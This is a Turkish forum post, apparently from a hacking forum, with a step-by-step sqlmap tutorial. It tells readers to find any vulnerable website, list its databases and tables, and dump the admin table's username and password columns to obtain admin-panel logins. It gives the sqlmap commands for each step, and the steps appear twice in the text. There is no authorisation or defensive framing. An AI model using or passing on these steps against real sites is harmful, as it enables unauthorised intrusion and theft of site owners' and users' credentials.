Selamun Aleyküm Beyler Birçok Kişimiz Sqlmap'i Nasıl kullanacağımızı soruyor.. Aslında Baya Basit Bir işlem Ben Bunun İçin Burda kısaca anlatıcam Birde Video Çektim Videoyu izlemeniz daha yararlı olacak çünkü videoda hem nasıl site bulacağımızı hemde bulduğumuz sitede sql açığı olup olmadığını anlattım bundan dolayı videoyu izlemeniz çok faydalı olacak. ayrıca nasıl kurulacağını bilmeyenler için bir video daha çektim onuda izleyebilirsiniz...
Not: Yazılı anlatım tercih etmeyenler videoyu izlesin video kısa ve yararlı
***Anlatıma Geçelim***
1-Öncelikle Açıklı Bi Site Bulucaz Bu İşlem Size Kalmış (Bilmeyenler Videoyu İzlesin)
2-Sqlmapi Kurulacak Nasıl (Bilmeyenler Videoyu İzlesin)
3-Üstteki 2 maddeyi tamamladıktan sonra sqlmapi açıp kodları yazacaksınız.
4-Bu Kod İle Siteyi Tarama işlemine başlayacaksnız.
5-Bu kodun sonrasında sitenin kolonları eğer sql injection başarılı olacaksa gelecektir
6-Gelirse Bu Kodu Yazacaksınız
Not:Bu Kodu yazarken 2 tane database ismi görebilirsiniz biri schame ile başlayan o database hep vardır o databaseden birşey çıkmaz o yüzden ilk çıkan databaseyi yazmalısınız
7-Daha sonra kolonlar düşecektir Düşen Kolanlardan admin,user,adminstrator, gibi kolonlar varsa onları çekmemiz gerekli çünkü admin cp girişleri orda yer alır
8-Mesela birçok kolon geldi ve aralarında admin kolonu var diyelim bu kodu yazın
9-Üstteki kodu yazdıktan sonra admin kolonundaki bilgiler gözükecektir
10-Bu bilgilerde genellikle user,pass olur yani kullanıcı adı şifre yazmanız gereken kod
11-Bu kod ile de admin kolonunda bulduğumuz user,pass verilerini dump kodu ile öğreniyoruz işte işlem bu kadar basit
Eğer Yapamazsanız Videoyu İzleyin Herşeyi anlattım ayarıntılı..
Sqlmap Kullanımı: [ame]https://www.youtube.com/watch?v=rBkx9lUcxGI[/ame]
Windowsa Sqlmap Kurulumu : [ame]https://www.youtube.com/watch?v=thb9eRY0eqw&t=4s[/ame]
JR\\\\\\Saygılarımla//////JR
Not: Yazılı anlatım tercih etmeyenler videoyu izlesin video kısa ve yararlı
***Anlatıma Geçelim***
1-Öncelikle Açıklı Bi Site Bulucaz Bu İşlem Size Kalmış (Bilmeyenler Videoyu İzlesin)
2-Sqlmapi Kurulacak Nasıl (Bilmeyenler Videoyu İzlesin)
3-Üstteki 2 maddeyi tamamladıktan sonra sqlmapi açıp kodları yazacaksınız.
4-Bu Kod İle Siteyi Tarama işlemine başlayacaksnız.
Kod:
sqlmap.py -u www.siteadresi.com --dbs
6-Gelirse Bu Kodu Yazacaksınız
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı --tables
7-Daha sonra kolonlar düşecektir Düşen Kolanlardan admin,user,adminstrator, gibi kolonlar varsa onları çekmemiz gerekli çünkü admin cp girişleri orda yer alır
8-Mesela birçok kolon geldi ve aralarında admin kolonu var diyelim bu kodu yazın
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı -T admin --columns
10-Bu bilgilerde genellikle user,pass olur yani kullanıcı adı şifre yazmanız gereken kod
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı -T admin -C user,pass --dump
Eğer Yapamazsanız Videoyu İzleyin Herşeyi anlattım ayarıntılı..
Sqlmap Kullanımı: [ame]https://www.youtube.com/watch?v=rBkx9lUcxGI[/ame]
Windowsa Sqlmap Kurulumu : [ame]https://www.youtube.com/watch?v=thb9eRY0eqw&t=4s[/ame]
JR\\\\\\Saygılarımla//////JR